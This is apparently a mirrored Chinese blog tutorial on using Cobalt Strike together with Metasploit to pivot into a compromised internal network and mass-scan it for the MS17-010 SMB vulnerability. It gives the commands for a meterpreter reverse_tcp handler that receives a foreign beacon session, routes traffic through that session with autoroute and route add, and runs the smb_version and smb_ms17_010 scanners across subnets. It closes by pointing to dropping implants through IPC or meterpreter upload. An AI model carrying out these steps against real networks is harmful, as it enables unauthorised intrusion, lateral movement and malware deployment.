zoukankan      html  css  js  c++  java
  • cs配合msf批量探测内网MS17-010漏洞

    第一步

    Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)

    第二步

    选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器

    第三部 msf

    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

     第四步添加路由

    如果在meterpreter中

    run get_local_subnets 查看目标内网路由
    run autoroute -s 100.0.0.0/8   #(根据目标内网网络而定)  添加路由
    run autoroute –p
    
    一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败,这时我们可以background返回msf>,查看下外面的路由情况。
    

     如果没有路由规则 那么可以在msf中

    msf>route add 10.0.0.0 255.0.0.0 1
    说明:1表示session 1,攻击机如果要去访问10.0.0.0/8网段的资源,其下一跳是session1,至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。

    然后

    连接postgresql数据库,不连接的话扫描的信息的信息无法入库。连接上后可通过db_status查看状态。
    
    Kali linux:
    
    首先启动数据库:service postgresql start
    
    启动msfsploit服务:service metasploit start
    
    启动msfconsole:msfconsole
    
    使用db_status确认数据库是否正确连接

    如果默认没有链接的话可以先自己装一个postgresql数据库,然后新建一个名为msf的库,在msf中执行命令连接:db_connect postgres:123456@127.0.0.1:5433/msf

    第三步:运行smb模块探测主机445端口开放情况。

    use auxiliary/scanner/smb/smb_version
    set rhosts 192.168.236.129/24
    set threads 16
    run

     扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看

     

     第四步:使用smb_ms17_010模块探测MS17-010漏洞

    use auxiliary/scanner/smb/smb_ms17_010
    show options
    set threads 16
    services -r tcp -p 445 -R
    run
    

     

     然后就是一系列的上马这些操作了 可以ipc也可以msf的upload

    文献参考

    https://www.cnblogs.com/backlion/p/9484949.html msf命令操作

    https://www.4hou.com/tools/4765.html

    https://bbs.ichunqiu.com/thread-53044-1-1.html cs

  • 相关阅读:
    android widgets控件
    android test控件
    android layout
    android build.gradle
    android studio AndroidManifest
    android studio settings
    (2)git本地生成SSH关联github
    (1)git
    bzoj2286 (sdoi2011)消耗战(虚树)
    Tree 树(树形期望dp)
  • 原文地址:https://www.cnblogs.com/-zhong/p/11737175.html
Copyright © 2011-2022 走看看